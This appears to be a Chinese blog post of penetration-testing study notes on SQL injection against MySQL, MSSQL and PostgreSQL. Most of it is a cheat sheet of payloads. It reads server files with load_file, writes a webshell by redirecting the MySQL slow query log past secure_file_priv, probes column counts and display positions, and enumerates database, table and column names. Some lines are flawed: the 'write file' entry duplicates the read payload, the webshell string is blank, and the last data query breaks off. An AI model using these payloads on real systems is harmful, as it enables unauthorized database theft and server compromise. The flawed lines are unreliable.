-
通用漏洞SQL注入之mysql&h&mssql&postgresql
- mysql数据库
-
root高权限读写注入
- 读取文件
- UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
- 写入文件
- UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
- 路径获取
- phpinfo,报错,字典等
-
无法写入
- secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
- set global slow_query_log=1
- set global slow_query_log_file='shell 路径';
- select '' or SLEEP(1);
- 读取文件
-
- mssql数据库
-
高权限读写注入
- 可以执行系统命令、读写文件操作
-
测列数
- ORDER BY 4
- AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
- 测显位
- AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL
-
获取信息
- AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
- AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
- AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
- 获取数据库名
- AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
- 获取表名
- AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
- 获取数据
- AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
-
- postgresql数据库
-
高权限读写注入
-
测列数
- order by 4
- and 1=2 union select null,null,null,null
-
测显位:第2,3
- and 1=2 union select 'null',null,null,null 错误
- and 1=2 union select null,'null',null,null 正常
- and 1=2 union select null,null,'null',null 正常
- and 1=2 union select null,null,null,'null' 错误
-
获取信息
- and 1=2 UNION SELECT null,version(),null,null
- and 1=2 UNION SELECT null,current_user,null,null
- and 1=2 union select null,current_database(),null,null
- 获取数据库名:
- and 1=2 union select null,string_agg(datname,','),null,null from pg_database
-
获取表名
- 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
- 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
- 获取数据
- and 1=2 union select
-
-
-
另外
- access无高权限注入点--只能猜解,还是暴力猜解
- MySQL,postgresql,mssql高权限注入点-可升级读写执行
- mysql数据库
网络安全之攻防笔记--通用漏洞SQL注入之MySQL&mssql&postgresql
Dawndddddd2025-02-19 22:08
相关推荐
使一颗心免于哀伤11 小时前
《设计模式之禅》笔记摘录 - 21.状态模式白帽黑客沐瑶2 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了_落纸2 天前
三大基础无源电子元件——电阻(R)、电感(L)、电容(C)Alice-YUE2 天前
【CSS学习笔记3】css特性2303_Alpha2 天前
SpringBoot鸿乃江边鸟3 天前
向量化和列式存储Hello_Embed3 天前
STM32HAL 快速入门(二十):UART 中断改进 —— 环形缓冲区解决数据丢失咸甜适中3 天前
rust语言 (1.88) 学习笔记:客户端和服务器端同在一个项目中Grassto3 天前
RAG 从入门到放弃?丐版 demo 实战笔记(go+python)